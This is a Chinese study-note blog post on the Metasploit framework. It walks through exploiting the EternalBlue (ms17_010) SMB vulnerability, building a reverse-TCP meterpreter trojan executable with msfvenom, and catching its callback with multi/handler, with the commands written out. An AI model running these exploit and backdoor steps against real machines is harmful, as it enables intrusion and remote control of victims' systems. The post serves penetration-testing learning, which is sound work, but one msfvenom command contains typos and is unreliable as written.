1.msf渗透和永恒之蓝漏洞

前言
  • 最近看到一个Metasploit学习课程,总共100个章节,计划一个月左右学习完成
Metasploit
  • Metasploit是一个开源的渗透测试框架,用于评估和验证计算机系统的安全性。它提供了一系列的工具、模块和资源,使安全测试人员能够自动化执行各种渗透测试任务。Metasploit框架包括一个控制台界面和一个丰富的模块库,其中包含了各种漏洞利用、扫描和后渗透技术。
  • Metasploit可用于发现和利用系统中的漏洞,以及进行远程代码执行、提权、持久性访问等攻击。它支持多种操作系统和网络协议,可以模拟各种攻击场景,并提供详细的报告和日志记录。
  • 其目的是让复杂的漏洞攻击流程变得非常的简单
msf的使用

小知识:ctrl+shift + 切换字体大小

  • 切换root用户
    • sudo su
    • 输入密码,默认为kali(密码不会显示)
  • 打开msf
    • msfconsole
msf攻击windows操作系统
  • 永痕之蓝漏洞

    • 是指微软Windows操作系统中存在的一个安全漏洞,该漏洞被命名为"EternalBlue"。这个漏洞是由美国国家安全局(NSA)开发的一种工具所导致的。
    • 这个漏洞存在于Windows操作系统的SMB(Server Message Block)协议中,攻击者可以利用这个漏洞,通过发送恶意代码到目标计算机,远程执行恶意操作。攻击者可以在目标计算机上执行任意代码、获取敏感信息、传播恶意软件等。
  • search + 漏洞编号 查找漏洞

    • search ms17_010 查找用永恒之蓝漏洞
    • 查找结果有4个,包括两个攻击模块,两个辅助模块
    • 在这里插入图片描述
  • 使用模块方法

    • use + 编号 或者 using 木块名
    • 在这里插入图片描述
  • 设置模块

    • 查看当前模块设置

    • show options 或者 options

    • 在这里插入图片描述

    • yes对应的为必须设置的内容

    • 设置目标地址

      • set RHOSTS 192.0.0.1
    • 在这里插入图片描述

      • 1为目标地址
      • 2为kali地址
    • 设置kali使用端口

      • set lport 60000
    • 攻击

      • run
    • 攻击完成之后,返回meterpreter,表示攻击完成后得到了目标机器的后渗透权限

    • background 退出

msf的使用
  • 远控木马的生成

    • msfvenom可以用来生成后门软件,在目标机上执行后门,在本地监听上线
    • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lpor=9999 -f.exe -o demo.exe
    • ​ 系统/架构/作用/方式 kali 0-65535 -o 输出文件 windows可执行文件名
    • 在这里插入图片描述
  • exploit/multi/handler模块的使用

    • 在这里插入图片描述

    • set payload windows/x64/meterpreter/reverse_tcp

    • set lhost 192.168.1.136

    • set lport 9999

    • run

    • 在这里插入图片描述

    • 上述参数设置应与远控木马的设置相同,当目标点击木马后既可以获取权限

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值